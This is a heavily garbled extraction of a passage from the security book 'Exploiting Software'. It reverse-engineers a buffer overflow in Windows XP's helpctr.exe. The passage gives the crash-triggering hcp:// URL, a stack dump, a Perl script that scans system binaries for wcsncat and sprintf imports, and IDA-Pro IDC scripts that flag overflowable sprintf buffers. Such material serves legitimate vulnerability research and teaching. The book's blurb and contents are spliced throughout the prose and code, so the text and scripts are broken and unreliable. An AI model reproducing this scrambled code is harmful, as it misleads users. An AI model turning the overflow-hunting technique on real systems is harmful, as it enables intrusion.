Decompilation in Practice: Reversing helpctr.exe The f ollow in g ex am ple illu st rat es a r ev erse eng in eer ing session ag ainst helpctr.exe, a Microso pr ogr am p r ovided w it h t he Wind ow s XP OS. The pr og ram happ en s t o h ave a secur it y v ulner abili k now n as a bu ff er over flow . Th is par t icu lar vu lnerab ilit y was mad e pu blic quit e som e t im e ago, s •r ev ealin g it her Table of Content e does not spose a r eal secur it y t hr eat . Wh at is im por t ant for our p ur poses is •descr ibin g t hI e ndex pr ocess of r evealing t he f ault t hr oug h r ever se en gineerin g. We u se I D A- Pro t o Expl oit ing Softw to soft Br e ak Code disassem ble t ha re e tHow ar get war e. The t arg et pr ogr am pr oduces a special debu g f ile called a Dr . Wat sonHoglund log . We only By Gr eg , Garuse y McGr aw I DA and t he inf or mat ion in t he d eb ug log t o locat e t he ex act coding er r t hat caused t h e pr oblem . Not e t h at no sour ce cod e is pub licly av ailable for t he t ar get sof t w ar e. Figur e 3- 4 sh ows I D A in act ion . Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: Figu r e 5132- 4 .

A scr e e n sh ot of I DA- Pr o r ev er se a ssem b lin g t he p r ogr am w hi ch i s in clu de d a s pa r t of t he M i cr osof t W in dow s XP OS. A a n ex er ci se, w e e xpl or e helpctr.exe f or a b uf f er ove r fl ow vu ln er a bi lit y

helpctr.exe,

How d oes sof t w are br eak ? How do at t acker s mfull akesize sofimt wage] ar e br eak on p ur pose? Why are [ View fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Bug Report

We lear ned of t h is vu lnerab ilit y just lik e m ost p eop le did, b y r ead in g a bu g r epor t post ed t o bu gt r aq, an ind ust r y m ailing list f oru m w her e soft w ar e pr oblem s and secur it y issues ar e discu ss The r epor t rev ealed only m inor d et ails ab out t he pr oblem . Most not ably , t h e nam e of t he execut ab le and t he inp ut t hat cau sed t he fault . The r ep or t r evealed t h at t h e URL hcp: / / w. w . w . w .w . w . w .w . w . w .w . w . w .w . w . w .w . w . w . w. w . w . w. w . w . w. w . w . , w hen su pplied t o I nt er Ex plor er, cau sed helpctr.exe t o laun ch . The URL does t h is by causing an applicat ion ex cep t ion ( w hich can be t ick led r em ot ely t h r ough a W eb br ow ser ) . •

Table of Content s

We r ecr eat e t h e fau lt by u sin g t he URL as inpu t in a Win dow s XP en vir onm ent . A debu g log is • creat ed by t hI ndex e OS and w e t hen cop y t he d eb ug log an d t he helpctr.exe b inar y t o a sep arat e Expl oit ing Softw a re How to Br e ak Code m achine f or analy sis. Not e t hat we used an older Wind ows NT m achine t o per for m t h e analy sis o Gr eg Hoglund Gar y McGrXP aw env iron ment is no longer r equir ed on ce w e induce t h e err or an d gat her tBy his b ug. The ,or iginal dat a w e need. Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1786 95 -8 The Debug Log Pages: 51 2

A d eb ug du mp is cr eat ed w hen t he p rog ram cr ashes. A st ack t r ace is included in t h is log, g iv ing a h int regar din g t h e locat ion of t h e fau lt y cod e:

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . 0006f8ac 0100b4ab 0006f8d8 00120000 00000103 msvcrt! wcsncat+0x1e This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en00120000 t f ound in m any hack ing book s, you w ill learn abou t 0006fae4 0050004f 00279b64 00279b44 HelpCtr+0xb4ab 0054004b 00000000 00000000 00000000 00000000 0x50004f Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns The cu lp rit app ear s t o be st r ing concat en at ion f un ct ion called wcsncat. Th e st ack d um p clear ly show sRev ourer (se fairengineer ly st raigin htgf orw ar d) URL st r ing . We can see t h at t h e URL st r ing dom inat es t he st ac space and t her eby ov er f lows ot her v alu es: Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

*----> Raw Stack Dump clien files.txt Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s This cr eat es a lar ge out put file of all t h e ex ecut able f iles u nder t h e WI NNT dir ect or y . Th e Per l scr Root k it s calldumpbin on each f ile and w ill analy ze t he r esult s t o det er m ine w h et h er wcsncat is bein g u sed Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

open(FILENAMES, "files.txt");

while () { chop($_); my $filename = $_; • •

Table of Content s

$command = "dumpbin /imports $_ > dumpfile.txt"; I ndex

Expl oit ing Softw a re How to Br e ak Code

#print "trying $command";

By Gr eg Hoglund , Gar y McGr aw

system($command); Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

open(DUMPFILE, "dumpfile.txt"); Pages: 51 2 while () { How d oes if(m/wcsncat/gi) sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools { can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o print ft w a re "$filename: is loaded w it h $_"; ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou } m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he } scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t close(DUMPFILE); Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem } When net w or k secur it y m ech anisms do n ot w or k close(FILENAMES); At t ack pat t er ns Rev er se engineer in g Classic t acks agaainst servin er t he softlab w arpr e odu ces t h e follow ing out p ut : Ru nning t h is at scr ipt on syst em Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak C:\temp>perl scan.pl soft w ar e. c:\winnt\winrep.exe:

7802833F

c:\winnt\INF\UNREGMP2.EXE: c:\winnt\SPEECH\VCMD.EXE:

2E4 wcsncat

78028EDD 78028EDD

c:\winnt\SYSTEM32\dfrgfat.exe:

2E4 wcsncat 2E4 wcsncat

77F8F2A0

499 wcsncat

c:\winnt\SYSTEM32\dfrgntfs.exe: c:\winnt\SYSTEM32\IESHWIZ.EXE: c:\winnt\SYSTEM32\NET1.EXE: c:\winnt\SYSTEM32\NTBACKUP.EXE: •

77F8F2A0 78028EDD 77F8E8A2

499 wcsncat 2E4 wcsncat

491 wcsncat

77F8F2A0

499 wcsncat

Table of Content s

c:\winnt\SYSTEM32\WINLOGON.EXE: • I ndex

2E4 wcsncat

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

er: Addison Wesley We Pub canlishsee t h at sever al of t h e pr ogr am s un der Window s NT ar e using wcsncat. Wit h a lit t le t im e: February 4 ine w h et h er t hey suff er fr om sim ilar pr oblems t o t h e ex am ple p rog ram audPub it t hDat ese f iles t o 17, det200 erm 20 1- 786 95 -8exam ine D LLs u sin g t his m et hod and gener at e a m uch lar ger list : earlier .I SBN: We 0could also Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. C:\temp>dir > files.txt Ex p lo i t in g S o /B ft w /S a re c:\winnt\*.dll is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . C:\temp>perl This m ust - h ave scan.pl book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem c:\winnt\SYSTEM32\AAAAMON.DLL: 78028EDD 2E4 wcsncat When net w or k secur it y m ech anisms7802833F do n ot w or k2E4 wcsncat c:\winnt\SYSTEM32\adsldpc.dll: At t ack pat t er ns c:\winnt\SYSTEM32\avtapi.dll: Rev er se engineer in g c:\winnt\SYSTEM32\AVWAV.DLL:

7802833F

2E4 wcsncat

78028EDD

2E4 wcsncat

Classic at t acks ag ainst serv er soft w ar e c:\winnt\SYSTEM32\BR549.DLL: 78028EDD

2E4 wcsncat

Sur pr ising at t acks ag ainst clien t soft war e c:\winnt\SYSTEM32\CMPROPS.DLL: 78028EDD

2E7 wcsncat

Tech niqu es f or cr aft ing m aliciou s inpu t c:\winnt\SYSTEM32\DFRGUI.DLL: 78028EDD 2E4 wcsncat The t echn ical det ails of b uf fer ov er f low s c:\winnt\SYSTEM32\dhcpmon.dll: 7802833F 2E4 wcsncat Root k it s c:\winnt\SYSTEM32\dmloader.dll: 2FB wcsncat Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. c:\winnt\SYSTEM32\EVENTLOG.DLL: 78028EDD 2E4 wcsncat c:\winnt\SYSTEM32\GDI32.DLL: c:\winnt\SYSTEM32\IASSAM.DLL: c:\winnt\SYSTEM32\IFMON.DLL: c:\winnt\SYSTEM32\LOCALSPL.DLL:

77F8F2A0

499 wcsncat

78028EDD 78028EDD

2E4 wcsncat 2E4 wcsncat

7802833F

2E4 wcsncat

c:\winnt\SYSTEM32\LSASRV.DLL: c:\winnt\SYSTEM32\mpr.dll:

2E4 wcsncat 77F8F2A0

c:\winnt\SYSTEM32\MSGINA.DLL:

7802833F

c:\winnt\SYSTEM32\msjetoledb40.dll: •

499 wcsncat 2E4 wcsncat

7802833F

2E2 wcsncat

Table of Content s

• I ndex c:\winnt\SYSTEM32\MYCOMPUT.DLL:

78028EDD

2E4 wcsncat

Expl oit ing Softw a re How to Br e ak Code

c:\winnt\SYSTEM32\netcfgx.dll: By Gr eg Hoglund , Gar y McGr aw c:\winnt\SYSTEM32\ntdsa.dll: Pub lish er: Addison Wesley

Pub Dat e: February 17, 200 4 c:\winnt\SYSTEM32\ntdsapi.dll:

7802833F 7802833F

2E4 wcsncat 2E4 wcsncat

7802833F

2E4 wcsncat

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2 c:\winnt\SYSTEM32\ntdsetup.dll:

c:\winnt\SYSTEM32\ntmssvc.dll: c:\winnt\SYSTEM32\NWWKS.DLL:

7802833F 7802833F 7802833F

2E4 wcsncat 2E4 wcsncat

2E4 wcsncat

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are c:\winnt\SYSTEM32\ODBC32.dll: 7802833F wcsncat fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us 2E4 soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. c:\winnt\SYSTEM32\odbccp32.dll: 7802833F 2E4 wcsncat Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d c:\winnt\SYSTEM32\odbcjt32.dll: t echniqu es used by bad guy s t o br eak sof t 7802833F w ar e. I f y ou2E4 w antwcsncat t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . c:\winnt\SYSTEM32\OIPRT400.DLL: 78028EDD 2E4 wcsncat This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s,2E4 you wcsncat w ill learn abou t c:\winnt\SYSTEM32\PRINTUI.DLL: 7802833F c:\winnt\SYSTEM32\rastls.dll: 7802833F 2E4 wcsncat Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem c:\winnt\SYSTEM32\rend.dll: 7802833F 2E4 wcsncat When net w or k secur it y m ech anisms do n ot w or k c:\winnt\SYSTEM32\RESUTILS.DLL: At t ack pat t er ns c:\winnt\SYSTEM32\SAMSRV.DLL: Rev er se engineer in g

7802833F

2E4 wcsncat

7802833F

2E4 wcsncat

c:\winnt\SYSTEM32\scecli.dll: Classic at t acks ag ainst serv er soft w7802833F ar e

2E4 wcsncat

c:\winnt\SYSTEM32\scesrv.dll: 7802833F Sur pr ising at t acks ag ainst clien t soft war e

2E4 wcsncat

c:\winnt\SYSTEM32\sqlsrv32.dll: Tech niqu es f or cr aft ing m aliciou s inpu t

2E2 wcsncat

The t echn ical det ails of b uf fer ov er 78028EDD f low s c:\winnt\SYSTEM32\STI_CI.DLL:

2E4 wcsncat

Root k it s c:\winnt\SYSTEM32\USER32.DLL:

499 wcsncat

77F8F2A0

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, 2E4 and wcsncat kn ow ledg e necessar y t o b reak c:\winnt\SYSTEM32\WIN32SPL.DLL: 7802833F soft w ar e. c:\winnt\SYSTEM32\WINSMON.DLL:

78028EDD

2E4 wcsncat

c:\winnt\SYSTEM32\dllcache\dmloader.dll:

2FB wcsncat

c:\winnt\SYSTEM32\SETUP\msmqocm.dll:

7802833F

2E4 wcsncat

c:\winnt\SYSTEM32\WBEM\cimwin32.dll:

7802833F

2E7 wcsncat

c:\winnt\SYSTEM32\WBEM\WBEMCNTL.DLL:

78028EDD

2E7 wcsncat

Batch Analysis with IDA-Pro •

Table of Content s

We alr eady illust rat ed how t o w r it e a plugin m odule f or I DA. I DA also supp ort s a scrip t in g lan gu • I ndex scr ipt s are called I DC script s an d can som et im es be easier t han using a p lu gin. We can p er f orm Expl oit ing Softw a re How to Br e ak Code analy sis wit h t h e I DA- Pr o t ool by using an I DC scr ipt as follow s: By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

c:\ida\idaw -Sbatch_hunt.idc -A -c c:\winnt\notepad.exe How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. w it h t he v ery basic I D C scr ip t f ile sh ow n h er e: Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem #include When net w or k secur it y m ech anisms do n ot w or k //---------------------------------------------------------------At t ack pat t er ns static Revmain(void) er se engineer{in g Classic at t acks ag ainst serv er soft w ar e Batch(1); Sur pr hang ising at t acks ag ainst database clien t soft war e */ /* will if existing file Tech niqu es f or cr aft ing m aliciou s inpu t Wait(); The t echn ical det ails of b uf fer ov er f low s Exit(0); }

Root k it s

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. As anot her exam ple, consider bat ch analy sis for sprintf calls. The Per l script calls I D A using t h line:

open(FILENAMES, "files.txt"); while () •

Table of Content s

{ •

I ndex

Expl oit ing Softw a re How to Br e ak Code

chop($_); By Gr eg Hoglund , Gar y McGr aw

my $filename = $_; Pub lish er: Addison Wesley Pub $command Dat e: February = "dumpbin 17, 200 4

/imports $_ > dumpfile.txt";

I SBN: 0- 20 1- 786 95 -8

#print $command"; Pages: 51"trying 2

system($command); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatopen(DUMPFILE, t ools can be u sed"dumpfile.txt"); t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d while () t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . { This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he if(m/sprintf/gi) scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t { Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem print "$filename: $_\n"; When net w or k secur it y m ech anisms do n ot w or k system("c:\\ida\\idaw -Sbulk_audit_sprintf.idc -A -c $filename"); At t ack pat t er ns } Rev er se engineer in g } Classic at t acks ag ainst serv er soft w ar e close(DUMPFILE); Sur pr ising at t acks ag ainst clien t soft war e }

Tech niqu es f or cr aft ing m aliciou s inpu t

close(FILENAMES); The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft ar e. We w u se t he script bulk_audit_sprintf.idc:

// //

This example shows how to use GetOperandValue() function.

//



Table of Content s

#include

• I ndex Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

/* this routine is hard coded to understand sprintf calls */ Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

static Pages: hunt_address( 51 2

eb,

/* the address of this call */

param_count, ec,

/* the number of parameters for this call /* maximum number of instructions to backtra

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion output_file sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ) Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d { t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . auto ep; /* placeholder */ This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he k;t r eat m en t f ound in m any hack ing book s, you w ill learn abou t scr iptauto k id die auto kill_frame_sz; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem auto comment_string; When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns k = GetMnem(eb); Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e if(strstr(k, "call") !=clien 0) t soft war e Sur pr ising at t acks ag ainst {Tech niqu es f or cr aft ing m aliciou s inpu t The tMessage("Invalid echn ical det ails of b uf starting fer ov er f low point\n"); s Rootreturn; k it s Ex p lo }i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

/* backtrace code */ while( eb=FindCode(eb, 0) ) {

auto j; j = GetMnem(eb);

/* exit early if we run into a retn code */ • •

Table of Content s

if(strstr(j, "retn") == 0) return; I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

/* push means argument to sprintf call */ Pub lish er: Addison Wesley

if(strstr(j, Pub Dat e: February 17, 200 4"push")

== 0)

I SBN: 0- 20 1- 786 95 -8

{

Pages: 51 2

auto my_reg; auto max_backtrace; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools canep be =u sed b reak warplace e? Th is*/ book p rov ides t he answ er s. eb;t o/* savesoft our Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u/* st fir st lear n h ow at t out acks the are really carr ied*/ ou t . work back to r eal find parameter This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he my_reg = GetOpnd(eb, 0); scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t fprintf(output_file, "push number %d, %s\n", param_count, my_reg); Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k max_backtrace = 10; /* don't backtrace more than 10 steps */ At t ack pat t er ns while(1) Rev er se engineer in g { Classic at t acks ag ainst serv er soft w ar e auto x; Sur pr ising at t acks ag ainst clien t soft war e auto y; Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s

eb = FindCode(eb, 0); /* backwards */

Ex p lo i t in g S o ft w a x re = is GetOpnd(eb,0); f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. if ( x != -1 ) { if(strstr(x, my_reg) == 0) {

auto my_src; my_src = GetOpnd(eb, 1);

/* param 3 is the target buffer */ •

Table of Content s



I ndex

if(3 == param_count)

Expl oit ing Softw a re How to Br e ak Code

{

By Gr eg Hoglund , Gar y McGr aw

auto my_loc; Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

auto my_sz;

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

auto frame_sz;

my_loc = PrevFunction(eb); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. fprintf(output_file, "detected Ex p lo i t in g S o ft w a re is loaded w it h exsubroutine amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 0x%x\n", my_loc); t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he my_sz = GetFrame(my_loc); scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t fprintf(output_file, "got frame Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem %x\n", my_sz); When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns frame_sz = GetFrameSize(my_loc); Rev er se engineer in g fprintf(output_file, "got frame size Classic at t acks ag ainst serv er soft w ar e %d\n", frame_sz); Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t kill_frame_sz = The t echn ical det ails of b uf fer ov er f low s Root k it s

GetFrameLvarSize(my_loc);

frame lvar y t o b reak Ex p lo i t in g S o ft w a re is f illed wit hfprintf(output_file, t h e t ools, con cept s, and "got kn ow ledg e necessar soft w ar e. size %d\n", kill_frame_sz);

my_sz = GetFrameArgsSize(my_loc); fprintf(output_file, "got frame args

size %d\n", my_sz);

/* this is the target buffer */ fprintf(output_file, "%s is the target buffer, •

Table of Content s



I ndex

in frame size %d bytes\n",

Expl oit ing Softw a re How to Br e ak Code

my_src, frame_sz);

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

/* param 1 is the source buffer */

Pages: 51 2

if(1 == param_count) { How d oes sof t w are br eak ? How dofprintf(output_file, at t acker s m ake sof t w ar e"%s br eak p ursource pose? Why are is on the buffer\n", fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. my_src); Ex p lo i t in g S o ft w a re is loaded w itif(-1 h ex amp of r eal at t ack s, at t ack pat t er ns, t ools, an d !=les strstr(my_src, "arg")) t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal { at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he fprintf(output_file, "%s is an argument that wil scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t overflow if larger than %d bytes!\n", Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem my_src, kill_frame_sz); When net w or k secur it y m ech anisms do n ot w or k } At t ack pat t er ns } Rev er se engineer in g break; Classic at t acks ag ainst serv er soft w ar e } Sur pr ising at t acks ag ainst clien t soft war e } Tech niqu es f or cr aft ing m aliciou s inpu t max_backtrace--; The t echn ical det ails of b uf fer ov er f low s if(max_backtrace == 0)break;

Root k it s

Ex p lo i t in g S o } ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. eb = ep; /* reset to where we started and continue for next paramete param_count--; if(0 == param_count) {

fprintf(output_file, "Exhausted all

parameters\n");

return; } } •

Table of Content s

if(ec-- == 0)break; /* max backtrace looking for parameters */



I ndex

Expl oit ing Softw a re How to Br e ak Code

}

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

static main() Pages: 51 2

{ auto ea; How auto d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are eb; fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatauto t ools last_address; can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in goutput_file; S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d auto t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y oufile_name; m u st fir st lear n h ow r eal at t acks are really carr ied ou t . auto This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t /* turn off all dialog boxes for batch processing */ Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Batch(0); When net w or k secur it y m ech anisms do n ot w or k /* wait for autoanalysis to complete */ At t ack pat t er ns Wait(); Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e ea = MinEA(); Sur pr ising at t acks ag ainst clien t soft war e eb = MaxEA(); Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s output_file = fopen("report_out.txt", "a"); Root k it s file_name Ex p lo i t in g S o ft w= a GetIdbPath(); re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

fprintf(output_file, "----------------------------------------------\nFilena file_name); fprintf(output_file, "HUNTING FROM %x TO %x

\n----------------------------------------------\n", ea, eb); while(ea != BADADDR) { auto my_code; •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

last_address=ea;

By Gr eg Hoglund , Gar y McGr aw

//Message("checking %x\n", ea); Pub lish er: Addison Wesley

my_code = GetMnem(ea); Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

if(0 == strstr(my_code, "call")){

Pages: 51 2

